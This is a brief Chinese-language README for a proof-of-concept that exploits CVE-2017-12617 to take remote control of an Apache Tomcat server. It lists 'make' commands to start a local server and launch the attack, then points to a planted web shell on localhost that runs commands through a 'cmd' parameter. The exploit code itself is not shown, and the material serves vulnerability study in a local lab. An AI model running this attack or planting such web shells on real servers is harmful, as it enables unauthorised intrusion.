此概念验证(Proof Of Concept)旨在演示如何利用 CVE-2017-12617 对 Apache Tomcat 服务器进行远程控制。
make server_up
make attack
如果此命令未自动打开您的浏览器,您可以访问:
http://localhost:8080/web_shell.jsp?cmd=pwd
现在您将能在浏览器中直接访问服务器上的 webshell。
如果您在运行此概念验证时遇到任何问题,请在 https://github.com/ygouzerh/CVE-2017-12617/issues 创建一个 issue,我们会尽快答复。